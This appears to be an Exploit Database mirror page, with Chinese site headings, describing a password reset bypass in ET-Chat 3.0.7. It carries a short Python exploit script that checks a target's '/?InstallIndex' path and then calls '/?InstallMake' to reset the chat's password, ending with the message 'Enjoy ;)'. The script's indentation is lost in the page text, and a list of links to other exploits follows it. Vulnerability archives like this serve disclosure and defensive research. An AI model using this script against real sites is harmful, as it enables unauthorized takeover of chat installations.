ET – Chat Password Reset Security Bypass

Exploit Database
20 阅读

作者： IRH

日期： 2014-03-09
类别：
- remote
平台：
- multiple
来源：https://www.exploit-db.com/exploits/39115/

source: https://www.securityfocus.com/bid/66149/info

ET - Chat is prone to a security bypass vulnerability.

An attacker can exploit this issue to bypass certain security restrictions and perform unauthorized actions; this may aid in launching further attacks.

ET - Chat 3.0.7 is vulnerable; other versions may also be affected.

#!/usr/bin/env python
__author__ = 'IRH'
print "Example: et-chat.py http://et-chat.com/chat"

import urllib
import sys

url = sys.argv[1]
url1 = url+"/?InstallIndex"
url2 = url+"/?InstallMake"

checkurl = urllib.urlopen(url1)

if checkurl.code == 200 :
urllib.urlopen(url2)
print "Password Was Reseted!! Enjoy ;)"
else:
print "Site is not Vulnerability"

last Exploits
ET – Chat Password Reset Security Bypass的更多信息

Netgear WG111v2 Wireless Driver – Long Beacon Overflow (Metasploit)：
DeepOfix SMTP Server 3.3 – Authentication Bypass：
OpenVAS Manager 4.0 – Authentication Bypass：
SmarterMail Build 6985 – Remote Code Execution：
VMware Tools – Update OS Command Injection：
Microsoft Internet Explorer – ‘createTextRange()’ Code Execution (MS06-013) (Metasploit)：
Trellian FTP Client 3.01 – PASV Remote Buffer Overflow (Metasploit)：
TP-Link TL-WR2543ND Router – Admin Panel Multiple Cross-Site Request Forgery Vulnerabilities：